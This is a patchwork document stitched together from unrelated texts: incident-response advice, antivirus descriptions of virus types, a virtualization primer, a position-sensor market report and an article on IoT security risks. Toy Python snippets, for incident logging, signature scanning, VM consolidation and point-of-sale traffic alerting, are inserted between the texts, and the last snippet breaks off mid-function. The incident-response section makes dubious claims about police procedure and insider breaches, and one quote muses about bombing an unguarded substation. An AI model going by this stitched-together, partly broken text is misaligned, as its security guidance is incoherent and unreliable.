Once the system has been restored to its earlier configuration, it is essential to go back over every step and procedure applied during the response and keep a record of it. That record becomes a lesson for everyone, whether the team leader or a general staff member. Sharing the episode within the team increases the team's experience with such incidents and with how to handle them. The lessons can also be recorded and communicated more widely to help recover some of the losses caused by the data leak or theft.

Reporting the incident is important for security, and it can help the company's reputation even though it has just suffered a loss. Making a gain out of a loss is not a new strategy in the business world; losses sometimes become the source of the next gains. A clear report of the incident, together with visible concern for the lost data, helps in two ways. First, other servers and organizations are alerted about the data, which can be identified and tracked if it surfaces elsewhere. Second, the company's name becomes associated with taking responsibility for the data it stores. Reporting therefore does not create a bad impression; it adds to the company's goodwill. An honest acknowledgement and apology can make a stronger impression than an announcement of best performance, because it demonstrates the company's sense of duty toward the data in its care.

Once the data is recovered, it is time to restore the entire system. During the restoration process, a proper backup of the system should be used, with fresh logs and loops put in place; this will make it easier to track the intruder. The forensic department of the police cyber crime unit can provide substantial support here, not only to reconstitute the system but also to trace the exact role and strategy of the intruder. It is therefore worth forming an incident response team and entrusting it with an incident response plan to protect the system from future incidents. A plan is only effective if it is updated continually: the cyber domain is among the most dynamic areas of the modern world, with rapid changes happening all the time, and a plan that is not kept current with both common and uncommon updates grows weaker until it becomes useless and ineffective. The incident response team should therefore be made up of the most adaptable employees, so that the plan itself remains dynamic.
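To make the escalation and record-keeping steps above concrete, here is a minimal sketch showing how the two timestamps, the notification of the team leader's senior, and the law-enforcement flag for data theft might be captured. The class, field and function names are invented for illustration and are not from any particular incident-management tool.

    from dataclasses import dataclass, field
    from datetime import datetime, timezone

    @dataclass
    class Incident:
        summary: str
        occurred_at: datetime          # time of occurrence, as reported by the first responder
        observed_at: datetime          # time the incident came to the team leader's attention
        data_sensitivity: str = "low"  # e.g. "low", "confidential", "regulated"
        involves_data_theft: bool = False
        log: list = field(default_factory=list)

        def note(self, message):
            self.log.append((datetime.now(timezone.utc), message))

    def escalate(incident: Incident):
        """Record both timestamps, notify the senior manager, and flag police notification if needed."""
        incident.note(f"Escalated to floor manager; occurred {incident.occurred_at}, "
                      f"observed {incident.observed_at}")
        if incident.involves_data_theft:
            incident.note(f"Notify local police: report time of occurrence and data "
                          f"sensitivity ({incident.data_sensitivity})")
        return incident.log

    inc = Incident("Customer database exfiltration suspected",
                   occurred_at=datetime(2016, 5, 3, 2, 15, tzinfo=timezone.utc),
                   observed_at=datetime(2016, 5, 3, 8, 40, tzinfo=timezone.utc),
                   data_sensitivity="regulated",
                   involves_data_theft=True)
    for when, msg in escalate(inc):
        print(when.isoformat(), msg)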
The first responder is the first person to observe the incident: he or she may have seen it happen, or may have been the first to notice that data was missing, leaked or deleted. When the police are called, the interrogation will begin with the first responder, and most of the initial facts will be collected from him or her: when the incident was first noticed, what was done immediately in reaction, what initial steps were taken to confirm that an incident had occurred, and how that confirmation was reached. These are some of the common questions a first responder has to face. The police may then take fingerprints from the systems and from the employees working there, and may even run DNA tests on suspect prints to identify the intruder.

One may also have to behave much as the police do after any incident. The police seal whatever is attached to an incident, such as the room where it took place or the items suspected of being used in it. In the same way, the affected systems or devices should be isolated and preserved.

Quarantine: Quarantine is a medical term for isolating a patient affected by a disease. Here the patient is the server or device and the disease is the incident, so the first step of isolation is to take the affected system off the server or network and keep the problem locked within a contained area.

Device removal: Once the device is isolated, it needs to be removed from the server or the wider system. For that, the looping and logging have to be redone: the loops must be reconstructed so the network keeps responding even after the device is removed, and the logs must be changed as well, since the previous logs may have been compromised by the intruder, and keeping the system or server running with the same logs would leave it open to further risk.

A data breach is an incident of data leakage or intentional data sharing. Incidents like data spills tend to stem from internal threats more than external ones: the number of passwords and logs an outsider would have to get past generally makes such an incident hard for external hackers to cause, so suspicion turns to internal staff. Identifying whether the incident is a data loss or a data breach is therefore very important. A data loss may well be due to an external threat, since external agents are generally the ones who steal data outright. If the incident is a data breach, the scenario is more delicate, but the police's work becomes simpler and easier, because the offender is within the team, and finding the culprit by interrogation and working the crime scene is not a big deal for police investigators.

Damage and loss control

Every incident, wherever and in whatever sector it happens, brings some damage with it. Even if no fixed asset is lost, the company's liabilities to its clients, its inability to finish assignments on time, and the resulting economic losses are all part of the damage caused by the incident. These must be managed and recovered by the company as quickly as possible.
To recover those losses, a loss control team can be set up within the incident response team. Its job is to plan the policies that will contain the company's losses and damages from the incident, restoring internal and external stability as quickly as possible through proper controls.

In short, these are the steps and plans of the incident response process. By following them, one can act responsibly toward one's job, toward the security of the client, and even toward the nation. Knowing which steps to follow after an incident makes decision-making under that kind of pressure and stress much easier.
Resident viruses are viruses that stay active in memory after they are first run. These viruses usually trap one or more system functions, typically file access and execution functions. When a trapped system function is called, the virus code gets control first and can infect the file or sector being accessed by the system; control is then passed to the system function that was originally called. Depending on the settings of your F-Secure security product, it will either automatically delete, quarantine or rename the suspect file, or ask you for a desired action.

More scanning & removal options

More information on the scanning and removal options available in your F-Secure product can be found in the Help Center. You may also refer to the Knowledge Base on the F-Secure Community site for more information.

Non-memory-resident viruses are viruses that search for infectable files themselves. When such a virus is run, it searches the hard drive for files of a specific name, type or extension and infects them. Some viruses limit the number of files they infect in one operation; this is done to hide the virus's presence, since the search and infection activity causes a lot of disk activity and can slow down an infected system considerably.

Overwriting viruses are viruses that replace the contents of other files with their own code, destroying the content of each infected file. A system hit by an overwriting virus quickly becomes unusable. Overwriting viruses are the most destructive of all virus types.

Description Details: F-Secure Anti-Virus Research Team; F-Secure Corp.; July 14th, 2003
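As an illustration of the simplest form of on-demand detection and quarantine described above (a toy example, not how F-Secure's scanning engine actually works), the sketch below searches files for a known byte signature and moves any match into a quarantine folder. The signature fragment and the directory paths are made up for the example.

    import shutil
    from pathlib import Path

    # Toy on-demand scanner: flag files containing a known byte signature.
    # The signature fragment and directories below are illustrative only.
    SIGNATURE = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR"   # fragment of the EICAR test string

    def scan_and_quarantine(scan_dir, quarantine_dir):
        quarantine = Path(quarantine_dir)
        quarantine.mkdir(parents=True, exist_ok=True)
        flagged = []
        for path in Path(scan_dir).rglob("*"):
            if path.is_file() and SIGNATURE in path.read_bytes():
                shutil.move(str(path), quarantine / path.name)   # quarantine the suspect file
                flagged.append(path.name)
        return flagged

    print(scan_and_quarantine("./downloads", "./quarantine"))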
The terms "virtualization" and "virtual machine" have been lingua franca for the better part of a decade, tossed around freely in every corner of the IT world. If you didn't really know what they meant, you just nodded knowingly to get through the meeting. If you're already savvy in the area of virtualization, forgive us as we refresh our memories with a look at the core concepts. However, feel free to look through the recent resources below and get caught up on virtualization developments from the past couple of years.

Actually, virtualization set down its roots more than 40 years ago, and certainly joined the computing lexicon in the 1970s when IBM introduced its VM (virtual machine) as a sort of overlay operating system. In the simplest sense, VM allowed an IBM mainframe to host two or more operating systems at the same time, allowing the users and applications employing each to think they were running on a dedicated machine. Today, virtualization is a concept applied to servers, networks, desktops, and storage. But it is server virtualization that drove the idea forward -- and, no, you don't need a $12 million mainframe to do it.

As the idea of shared, networked computing resources (servers) advanced, it was common practice to dedicate a single server to an operating system and the applications that it supported, even if that software only used a tiny fraction of the hardware's capability. On the other hand, if the workload maxed out the hardware, the only solution ensuring uptime was to buy a bigger server and reinstall all of the software on the new platform. Virtualization techniques initially focused on that hardware utilization challenge, giving IT administrators the flexibility to run applications on whichever hardware platform was available, even across multiple servers. Some of the jobs running on a nearly maxed-out system could easily be shifted to an underused system as needed, by letting those applications run in virtual machines without users knowing which hardware they were running on. Server virtualization gave IT the ability to support applications as demand grew, and to consolidate other applications from underutilized servers. Cost savings on hardware and software licenses and ease of management were the key driving factors.

As server virtualization has evolved, not just with software but with specially designed hardware enabling virtualization, benefits beyond cost have emerged. Yes, virtualization still aids consolidation and load sharing. It can also support scaling for global growth of the company, disaster recovery strategies, use of VMs for development and test, integration of digital telecommunications (VoIP phone) applications, and, with the growth of software-defined networking, virtual networks on the same types of servers that host email and office applications.

Today, IT managers can choose from a variety of software options to implement server virtualization, with hypervisors (which create and manage virtual machines) and other management tools. Key software players and platforms include VMware, Microsoft, Red Hat, the Linux-based KVM, and Citrix with its open-source Xen technology. In addition, hardware companies such as Intel are designing their processors with virtualization capabilities.

Need more details on server virtualization? Browse these resources:

- The Software-Defined Data Center: Potential Game Changer.
Extending virtualization across multiple data center technologies, the SDDC is intended to provide IT pros with improved flexibility in managing resources.
- Server SANs And Healthy Paranoia. Server SANs, which dedicate storage resources to a server, are targeted at virtualization admins as buyers.
- Data Protection Must Change In Virtualization Age. While server virtualization can make life easier for the IT admin, it can complicate matters for IT security, particularly when it becomes challenging to figure out which VMs are running on which platforms.
- Compromising Virtualization. Server virtualization is generally considered a first step into cloud computing. However, instance storage is a concept that can improve performance in a virtualized server/cloud environment, but it also presents some challenges.
- Governments Missing Out On Virtualization Savings. Some government agencies say that virtualization has led to cost savings, but there's a lot more to be done.
- Microsoft, Others Closing In On VMware In Server Virtualization Market. VMware was the dominant provider in the virtualization market for a long time, but by 2012 Microsoft, Citrix, and KVM were helping to level out prices.
- Virtualization Vs. Networking. In addition to the security issues that virtualization can present, it also can overload a network with data and requests for data flowing from many VMs.
- How Server Virtualization Works. Still need to know more about the basics of virtualization? Check out How Stuff Works and this general description.
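The consolidation benefit discussed earlier, packing workloads from underutilized servers onto fewer hosts, can be illustrated with a simple first-fit-decreasing placement sketch. The capacities and workload numbers are invented, and real capacity planners weigh memory, I/O and availability as well.

    # First-fit-decreasing placement: a rough sketch of how a capacity planner
    # might consolidate VM workloads onto as few physical hosts as possible.

    def consolidate(vm_loads, host_capacity):
        """Return a list of hosts, each a list of the VM loads placed on it."""
        hosts = []
        for load in sorted(vm_loads, reverse=True):
            for host in hosts:
                if sum(host) + load <= host_capacity:
                    host.append(load)
                    break
            else:
                hosts.append([load])    # no existing host fits; start a new one
        return hosts

    # Ten lightly loaded VMs (CPU utilization %) packed onto hosts capped at 80%.
    vms = [35, 10, 25, 5, 40, 15, 20, 10, 30, 8]
    placement = consolidate(vms, host_capacity=80)
    print(len(placement), "hosts needed instead of", len(vms))   # 3 instead of 10
    print(placement)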
Global Position Sensor Market Research Report

Sensors are usually classified on the basis of their applications. For example, a sensor used to measure pressure is known as a pressure sensor, and a sensor used to measure humidity is known as a humidity sensor. A sensor used to measure the distance travelled by an object with respect to a reference point is known as a position sensor: it measures an object's movement or displacement from a reference point or initial position. The motion of the object can be linear, angular or multi-axis. On the basis of motion, these sensors can be classified as linear position sensors or angular position sensors: a sensor used to detect movement in a straight line is termed a linear position sensor, and a sensor used to detect angular movement is termed an angular position sensor or rotational sensor. Position sensors can also be classified by the sensing principle used to measure displacement: potentiometric position sensors, capacitive position sensors, linear variable differential transformers, magnetostrictive linear position sensors, eddy-current-based position sensors, Hall-effect-based magnetic position sensors, fiber-optic position sensors and optical position sensors.

Potentiometric Position Sensor
This sensor uses the resistive effect for sensing; the basic element is simply a resistive or conductive track. To measure the displacement of an object, a wiper is attached to the object or to part of it, and the wiper stays in contact with the track. Potentiometric position sensors are convenient to use, low cost and low technology. The main disadvantage is wear resulting from the moving parts; other disadvantages are low accuracy and repeatability, and limited frequency response. The three main types of potentiometers:
c) Plastic film

Linear Variable Differential Transformer
This is a type of position sensor that is free from mechanical wear problems. It falls into the category of inductive position sensors and is based on the same principle as an AC transformer used to measure movement. This device is very useful for measuring linear displacement.

Eddy current sensor
This sensor is not used to measure displacement or angular rotation; it is used to detect the presence of an object in front of it or in close proximity. It is a non-contact position sensor that uses a magnetic field for detection.

Linear and Rotary Position Sensor Market
Linear and rotary position sensors and transducers convert mechanical displacement into a proportional electrical signal. They find applications in machine tools, material handling, test equipment, robotics and more, and are typically used for position measurement by detecting angular or straight-line movement of an object.

Presence sensing Edges
Presence sensing Edges and Presence sensing Mats add up to the total Position Sensor market. Submarkets of Presence sensing Edges are Machine safety. Key Questions Answered: What are market estimates and forecasts; which of...

Presence sensing Mats
Presence sensing Mats and Presence sensing Edges add up to the total Position Sensor market.

Linear displacement sensor
Linear displacement sensors and Proximity Sensors add up to the total Linear Position Sensor market. Submarkets of this market are Servo and Magnetic Field Sensor. ...
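To make the potentiometric principle above concrete: the wiper voltage is proportional to how far the wiper has travelled along the track, so position can be recovered from a simple ratio. The sketch below is illustrative; the supply voltage, track length and ADC resolution are made-up values.

    # Potentiometric position sensing: position is proportional to the wiper voltage.

    def position_mm(v_wiper, v_supply=5.0, track_length_mm=100.0):
        """Estimate linear position from the wiper voltage of a potentiometric sensor."""
        return (v_wiper / v_supply) * track_length_mm

    def adc_to_position_mm(adc_counts, adc_full_scale=1023, track_length_mm=100.0):
        """Same idea when the wiper is read through a 10-bit ADC."""
        return (adc_counts / adc_full_scale) * track_length_mm

    print(position_mm(2.5))            # 50.0 mm: wiper at mid-track
    print(adc_to_position_mm(256))     # ~25.0 mm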
Imagine the havoc that hackers could cause a nation by systematically targeting its power grid. Or the implications of criminals taking control over a city's network of video cameras. Or of a hacker taking control of a commercial airplane en route. While some of these risk scenarios may seem exaggerated, the ability of Stuxnet malware to cause physical damage has been shown in an Iranian nuclear facility. Last year, the Lloyd's "Business Blackout" report stated that the U.S. power grid itself was at risk of a Stuxnet-style attack, potentially causing $1 trillion in damages.

We need your help: After reading through the ten IoT security targets described in the article below, let us know which item you think represents the biggest overall risk.

1. Industrial Facilities

There is already an account of a hacked German steel mill, which caused massive damage to the facility. Criminals used a combination of spear phishing and social engineering to gain access to the steel mill's office network. From there, the hackers gained access to the production system and took over industrial control components in the plant. It is difficult to know how often industrial plants are hacked for extortion because such breaches are rarely reported, according to Marina Krotofil of the Hamburg University of Technology.

Phishing and social engineering attacks are not going away anytime soon, says Thomas Pore, director of IT and services at Plixer. "Commercial facilities, along with every organization, need to provide training to users on how to identify phishing attacks or how to avoid being a victim of social engineering," he says. "Users need to be trained not to click on links in emails. Training should not be a one-time event, at time of hire; it should be performed regularly, even quarterly. When a phishing attempt is identified, an announcement should be made to employees as an example of how to identify it. Authentication and privilege should be configured under the principle of least privilege, as well as implementing software restriction policies, to help prevent an actor from gaining access to critical resources should a breach occur. At this stage in the game, we need to operate our networks as though a breach will occur."

2. Connected Cars

Two cybersecurity experts caused a ruckus in 2015 when they took control over a Jeep as it was cruising down the freeway. Although that was a stunt for Wired, the attack showed how dangerous such attacks could be in theory and led to the recall of 1.4 million vehicles. Fiat Chrysler recently indicated it had a new strategy for addressing security holes: pay security experts to find them. The company has a bug bounty program that rewards experts anywhere from $150 to $1,500 each time they find a security weakness and share it with the company. Recent evidence suggests that some high-tech thieves are now using laptops to steal cars. But the threats become much greater as cars become ever more connected, not to mention semi- and fully autonomous.

"Perhaps it goes without saying that the most dangerous part of the connected car is the 'connected' part," says Cesare Garlati, chief security strategist at the prpl Foundation. "We've seen recently with the Nissan Leaf that researcher Troy Hunt was able to drain the car of its battery life using little more than its vehicle identification number (VIN) and accessing the car's climate control system.
While this, strictly speaking, isn't life threatening, it's a good example of how, using a little lateral thinking, one part of the car's anatomy can be used to get to another."

Garlati says this could have dangerous consequences if hackers found their way into more critical functions, such as the steering and brakes, as researchers were able to do with a Jeep back in 2014. "The situation is made worse because many engineers tasked with designing and building systems are not experts in network protocols and even less versed in network security," Garlati says. "They may know how to put together hardware components, but implementing TCP/IP protocols is a rarefied discipline which requires expert knowledge and extensive debug and testing. While it's unfair to expect mechanical and electrical engineers to shoulder this burden, the lack of subject matter expertise is leaving systems wide open to attack, something which vendors, regulators and manufacturers must carefully consider as the evolution of connected cars continues."

"The future of connected cars has the potential of being very dangerous," agrees Thomas Pore, director of IT and services at Plixer. "There is no such thing as infallible code, meaning that a product while completely secure today could be exploited tomorrow. Bug bounty programs have been around for a while but have increased in popularity recently. This is great in concept and will prove useful as weaknesses will be discovered; however, this does not remove all the risk. Ethical security experts will reap the rewards, but what about the unethical actors out there that could care less about $1500, but will hold out for the highest bidder? Zero-day vulnerabilities around autonomous features could be exploited to create giant traffic jams or even in assassination attempts."

3. Video Cameras

Surveillance cameras are intended to make us more secure, and many cities across the U.S. have installed them, thanks to grants from the Department of Homeland Security. But the wireless networks used for transferring video signals can be insecure. In 2014, two security experts announced at Defcon that they managed to break into a police wireless mesh network in an unnamed town. "We could do all sorts of tomfoolery -- hey, let's have Godzilla walk down the street," said Dustin Hoffman, the president of Exigent Systems, to VentureBeat. "Or we could do the opposite and send police resources elsewhere."

"Another risk with video cameras, and other IoT devices, is the ability for them to be used to create botnets to send spam and ransomware, launch DDoS attacks, and commit other mischief," says Cesare Garlati, chief security strategist at prpl Foundation. "The very fact that patching isn't high on the priority list for admins is testament to why security in devices like CCTV cameras needs to be 'baked in' at the chip or hardware layer. If we don't take steps now to improve security within devices at the development level, the results could be catastrophic, especially when they can be hijacked and directed at critical infrastructure."

"Cameras will always be a target of hackers as they can potentially provide sensitive video or even audio into a target network," says Thomas Pore, director of IT and services at Plixer. "Additionally, a compromised camera can be used as a critical foothold into a target network as well as be used to alter audio/visual settings that would interfere with monitoring.
They are often easy targets as many deploy cameras with public-facing IPs, allowing anyone to send and receive packets from them. Also, camera firmware is often not maintained for long as development of newer technologies becomes a priority, and even if firmware does get patched, many cameras will never see an update. In the case of the two experts hacking into a wireless mesh network, it was identified that this was largely based on an implementation failure by the vendor. Perhaps this could have been avoided by better managing and monitoring risk during vendor selection."

4. IoT-Enabled Spying and Potential for Cyberwarfare

"Science fiction cyber-war is here," according to Oscar-winning filmmaker Alex Gibney, whose recent Zero Days film examines the Stuxnet worm, which was far more advanced than ordinary malware. Purportedly developed by the U.S. and Israel, the Stuxnet worm proved that it is now possible for a worm to attack critical infrastructure. The worm was first detected about six years ago and is reported to have ruined a fifth of Iran's nuclear centrifuges. Stuxnet can target programmable logic controllers (PLCs) and supervisory control and data acquisition (SCADA) systems, enabling it to attack a vast number of systems.

According to the film Zero Days, it is likely that Stuxnet represents the first example of an entirely new class of cyberweapons. After Iran discovered the worm, the nation would go on to expand its nuclear program and create one of the largest cyber-armies in the world. In 2012, Iran would go on to attack Saudi Aramco, the biggest oil company in the world. Earlier this year, seven Iranians were charged with launching computer attacks targeting American banks and a dam in New York. The United States purportedly developed and shelved a plan known as Nitro Zeus designed to bring down Iran's air defenses, communications equipment, and much of its electrical grid.

On a related note, the Internet of Things could provide new avenues for spying. NSA deputy director Richard Ledgett admitted as much earlier this year, stating that the agency was looking into spying on the Internet of Things.

"In a Black Hat 2015 presentation, researchers Runa Sandvik and Michael Auger claimed to have found a way to hack the ShotView targeting system on TrackingPoint's hi-tech Linux-powered rifles," explains Cesare Garlati, chief security strategist at prpl Foundation. The company's .338 TP bolt-action sniper rifle is said to provide precise impact on targets out to .75 mile. Although they claimed the company had "done a lot right" and minimized the attack surface, the researchers were still able to compromise the rifle via its Wi-Fi connection, exploiting software vulnerabilities to prevent the gun from firing, or even to cause it to hit another target according to their instructions.

Fortunately, a remote attack on the rifle couldn't make it fire, as that requires a physical pull on the trigger, Garlati adds. "However, Sandvik and Auger were able to demonstrate how to effectively brick the rifle, making its computer-based targeting permanently unusable. For a weapon that costs $13,000 and could be highly dangerous in the wrong hands, the research is concerning."

5. Power Grids and Utilities

In January, Ukraine accused Russian hackers of shutting down almost a quarter of its power infrastructure, knocking out at least 30 of its 135 power substations. While matching that feat in the United States may be slightly more complicated, it is not apparently very difficult at some facilities here.
In April, a team of white-hat hackers known as RedTeam showed how easy it was to break into a U.S. power company’s grid in a matter of days. In addition, cybersecurity experts have been warning of the risk of hackers breaching the power grid and natural gas pipelines. The fact that squirrels and other rodents cause some 200 power outages per year raises the question of what determined cyber-attackers could do. Imagine the impact of wiping out power to, say, most of the East Coast for even 24 hours. It is not only an abstract risk. In 2013, the Metcalf sniper attack on a California electrical substation caused $15 million in damages.

“Yes, squirrels or other rodents can take out power due to their physical access,” Pore says. “The electrical substation that services my house is a few miles down the road and supplies power to an entire town. It also happens to be located just off the road (~50 ft), guarded by nothing more than a chain-link fence. Imagine the damage someone could do simply tossing a bomb over the fence or driving a car bomb into the center of the substation,” Pore adds.

“One could do some very serious damage quickly since it is unguarded,” Pore explains. “Since networks of power grids and utilities are classified as a critical sector, there should be continuous audits and penetration testing performed, similar to RedTeam breaking into a power grid. Simply following a framework, such as NIST, is not enough anymore. The bad guys are reading the same material, and to maintain operational excellence, additional security strategies and analytic modeling using network traffic coupled with contextual detail, such as user/badge authentications, will need to be implemented.”

The Stuxnet worm, which was already mentioned here, was reportedly developed to bring down Iranian nuclear facilities suspected of enriching uranium.

“The attack on Ukraine’s power grid was a very frightening example!” says Cesare Garlati, chief security strategist at prpl Foundation. “At its core, it involved connected devices used in industrial control and automation (IoT): attackers wrote malicious firmware to replace the legitimate firmware on serial-to-Ethernet converters at more than a dozen substations (the converters are used to process commands sent from the SCADA network to the substation control systems). Taking out the converters prevented operators from sending remote commands to re-open breakers once a blackout occurred.”

“While targeted attacks such as Stuxnet and Nitro Zeus are carefully articulated to gain entry into secure facilities, the world of IoT creates significantly more opportunities to get a foothold into a network. It is not surprising that the NSA is excited to see the market grow quickly,” Pore says. “In an effort for companies to get products to market first, product security takes a back seat to product design. IoT is supposed to make life more convenient; however, convenience compromises security.”

The building industry has been slower than many to embrace digital technology. But that is beginning to change quickly as building automation technology rapidly gains in popularity. As more buildings become connected, the risk for exploits increases. Already in 2013, Google saw its Wharf 7 office in Sydney, Australia, get hacked by way of its building management system. One of the hackers, Billy Rios, told the BBC that the building systems were very simple to breach. Rios estimates that there are some 50,000 such systems globally that are connected.
Of those, 2,000 are online and don’t have any password protection, inviting criminals to access their heating and cooling systems and potentially take control of their connected door locks.

“The home is something that is precious – you wouldn’t just allow anyone through your front door, so why do people do it with their connected devices so willingly?” Garlati asks. “When it comes to IoT in the home, people must realize that security of these devices just doesn’t exist yet.”

“A case such as the exposure of vulnerabilities in Samsung’s SmartHome platform brings forward a number of questions, particularly: Do these systems really need a mobile app? Does the app really need to connect to a central server in the cloud? And most importantly, is it sound to have a smartphone (especially one running Android) control anything that is critical to you?” Garlati says.

“These are all key questions to address when we look at IoT, especially in the home, as a vast majority will not use apps that are developed by the OEM, but rather assembled using a host of third parties – over which they have no control or visibility,” Garlati notes. “To combat this, OEMs should implement open and interoperable standards in their devices, home IoT architecture should rely only on a local hub, and this hub should be secured. If researchers can break these devices, it’s a safe bet that criminals may have already found a way in, too.”

“You can do all the vulnerability patching you want, but if the basic security strategy of authentication for privilege is not being configured, it’s time to reevaluate the vendor,” Thomas Pore says. “Developing guidelines on how tech will be deployed and auditing the deployment based on the guidelines will help reduce third-party risk.”

7. City Infrastructure and Transportation Networks

Last year, Cesar Cerrudo, CTO of IOActive Labs, proclaimed that many cities risk cyberattacks—even those that don’t consider themselves to be so-called “smart cities.” The majority of cities around the world use at least some form of connected technology to manage everything from traffic to lighting to public transit. Still, few cities engage in regular cybersecurity testing, and many have weak security controls in place.

But it doesn't take a full-fledged cyberattack to cause problems. Even software bugs can cause significant glitches. For instance, Lake Tahoe–adjacent Placer County accidentally summoned 12,000 of its citizens to jury duty on one morning in May 2012, snarling traffic in the area. And on November 22, 2013, the San Francisco Bay Area Rapid Transit (BART) system was brought to its knees as a result of a software glitch, trapping a total of 500 to 1,000 passengers onboard.

“We’ve also seen that Transport for London is looking to IoT sensors and the data they provide to help improve congestion for commuters, but they must not overlook the wider security and privacy implications this will have on the City of London,” Garlati explains. “IoT, although growing at an enormous pace, is still very much in its infancy – with people eager to get their hands on the latest and greatest connected devices and manufacturers rushing to get them to market – security is often an afterthought.”

If IoT developers don’t take steps now to improve security within devices at the development level, the results could be catastrophic, especially when devices are used to capture data on passengers and whole cities, as suggested by TfL’s CIO, Steve Townsend. “At best, people’s privacy and civil liberties are affected.
At worst, poor security controls will mean terrorists will have access to a whole host of information they can use for surveillance or other nefarious purposes when security controls aren’t properly addressed,” Garlati says. For this reason, the prpl Foundation has provided guidance on how to create a more secure Internet of Things that advises manufacturers and developers to adopt a hardware-led approach that sees security embedded from the ground up.

8. Medical Devices and Hospitals

The security used in many medical devices and hospitals lags behind that used in many other industries. Not long ago, it was a common occurrence for some medical devices to have hard-coded passwords. Within hospitals, tales abound of staff who have Post-it notes with passwords scribbled on them. Already, several hospitals have been hit with ransomware, including Hollywood Presbyterian Medical Center in Los Angeles, which was attacked earlier this year. Attackers brought down computers for a week using ransomware and ultimately extorted $17,000 from hospital administrators.

The notion of terrorists hacking the vice president’s pacemaker was made famous in the show Homeland. While it is theoretically possible for hackers to maim or kill patients who use medical devices, perhaps a bigger threat relates to data breaches. Medical devices are often connected to databases holding sensitive patient information that can be used for identity theft. Hackers could breach IoT-enabled hearing aids to snoop on people at home and at work.

“Healthcare is another industry that is coming to rely on connected devices and smart sensors to help medical professionals provide more effective patient care,” Garlati explains. “However, the US Food and Drug Administration (FDA) was forced to warn hospitals in 2015 against using a popular internet-connected drug infusion pump after research from Billy Rios revealed it could be remotely hacked. Attacks like this may be harmful to human lives, as medicine applied in the wrong dosages becomes a potentially lethal weapon.” The FDA notice included the following warning: “This could allow an unauthorized user to control the device and change the dosage the pump delivers, which could lead to over- or under-infusion of critical patient therapies.” The affected devices were the Hospira Symbiq Infusion System (v3.13 and earlier), the Plum A+ Infusion System (v13.4 and earlier), and the Plum A+ 3 Infusion System (v13.6 and earlier).

“The manufacturer has claimed there are no known cases where these pumps have been accessed remotely by unauthorized parties. It is also claiming that most of these devices will be replaced in the next 2–3 years,” Garlati explains. “However, with the healthcare IoT market set to be worth $117 billion by 2020, according to MarketResearch.com, there’s an increasing need for manufacturers to reengineer vital systems to ensure they can’t be misused in this way.”

“Medical personally identifiable information (PII) is worth considerably more than other types of PII and sells for 10–20 times the price of a U.S. credit card number on the dark web,” Pore says. “The risk around compromising medical devices within hospitals, even ransomware, is geared around the real-time assistance the hospital provides. Hospitals cannot afford to have their servers locked down with ransomware, and restoring from a backup takes time, which many do not have. The risk of physical harm around compromising medical records lies in the concept of a mixed medical record, where someone receives care in the name of someone else.
The fraudulent user’s medical information becomes mixed in with the true patient’s information, which could have severe consequences, such as the prescription of medications. Routine off-site or off-network backups of critical systems are the only sure-fire way to recover from ransomware. User training to identify phishing attacks is also paramount. Users just love clicking on URLs in email. The FBI is taking a firm stance on not paying ransoms; however, each case is different.”

Last year, Chris Roberts, a security researcher at One World Labs, made headlines after boasting that he hacked into a United Airlines jet and modified code on the craft’s thrust management computer while onboard. An FBI search warrant states that he succeeded in commanding the plane to climb, altering the plane’s course. Roberts told the FBI that he had identified vulnerabilities in several commercial aircraft, including the Boeing 737-800, 737-900, 757-200, and the Airbus A-320. Roberts also boasted that, in 2012, he had hacked into the International Space Station.

Airplanes today are controlled by complex connected computer systems. “Sensors all over the aircraft monitor key performance parameters for maintenance and flight safety,” Garlati explains. “On-board computers control everything from navigation to in-cabin temperature and entertainment systems. Chris Roberts was apparently able to overwrite code on the airplane’s Thrust Management Computer while aboard a flight, causing a plane to move laterally in the air.”

Roberts denies having done this during a real flight, and Boeing has claimed in-flight entertainment systems are isolated from flight and navigation systems. However, when it comes to the aviation industry, the stakes are even higher with regard to potential flaws in IoT systems. “As airlines transition to even more advanced systems leveraging these technologies, more attention needs to be focused on underlying system weaknesses that could represent a security and safety risk,” Garlati explains. He asks:

- What are airports doing well on this front, and what's still missing?
- What is the one major step all airports should take to avert an attack (perhaps hiring a cyber expert, or employing a crisis management system)?

“Airport managers must understand that security is likely to fail if it’s not built in by design,” Garlati says. “In fact, I would go so far as to say that if it’s not secure, it doesn’t work. So the mindset of pen testing and bringing on cyber security experts at a later date to ‘fix holes’ is a false economy – having said that, it is obviously better than nothing,” he adds. “But industry as a whole needs to change this mindset and work towards building and developing systems and devices with security at the core. The march of silicon means that it is becoming more powerful, and so it is possible to add traditional security layers embedded at the hardware level, making it resilient to attack.”

Hackers with physical access can accomplish significantly more damage, and traditionally access is the difficult part. “In the case of Chris Roberts hacking an aircraft, physical access was the easy part, using the seat electronic box (SEB) which was present for the in-flight entertainment system,” Pore says. “Network segmentation would definitely have slowed down the attack and perhaps prevented Roberts from accessing critical aircraft management systems. It was noted in the FBI interview that Roberts used default credentials to gain access.
There is always significant risk involved with leaving physical access available and not changing default credential sets.”

10. Retail Stores and Databases

Last year, Tripwire announced the results of a study conducted by Atomic Research that found that retail security lags behind that of many other sectors. While many of the cybersecurity risks facing retailers aren’t strictly IoT related, a growing number of them are. For instance, in late 2013, hackers managed to break into Target’s payment systems by way of an HVAC vendor. The criminals responsible for the attack managed to steal network credentials from an HVAC vendor who had worked at a number of Target facilities in addition to other large retailers. Retail companies remain one of the most attractive targets for hackers because they store vast troves of financial data. Retail-related IoT devices will only add to that volume.

“Retail environments, like critical sectors, need to undergo a paradigm shift in network security,” Pore says. “If organizations are only deploying perimeter-focused tools to keep threats out, they will likely become the next victim. In addition to traditional technologies such as firewalls, IDS, IPS, and anti-virus, a shift to protecting core assets using analytics needs to be implemented. This can be accomplished using network behavior coupled with indicator correlation to detect threats and undesired behavior. Watching, profiling, and alarming on thresholds for critical assets, such as point-of-sale machines reaching out to the internet, will help keep organizations from becoming the next headline.”
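To make Pore’s last point concrete, here is a minimal sketch of the kind of threshold alerting he describes: flagging point-of-sale hosts that reach out to the internet. The POS subnet, the approved-destination list, and the flow-record columns are hypothetical placeholders invented for the example, not details drawn from the article.

    # Illustrative sketch only: flag POS hosts contacting unapproved external IPs,
    # based on exported flow records in a simple CSV with src_ip, dst_ip, bytes.
    import csv
    import ipaddress

    POS_SUBNET = ipaddress.ip_network("10.20.30.0/24")            # assumed POS VLAN
    APPROVED_DESTINATIONS = {"203.0.113.10", "203.0.113.11"}      # e.g., payment processor

    def suspicious_flows(flow_csv_path):
        """Yield flow records where a POS host talks to an unapproved external IP."""
        with open(flow_csv_path, newline="") as f:
            for row in csv.DictReader(f):
                src = ipaddress.ip_address(row["src_ip"])
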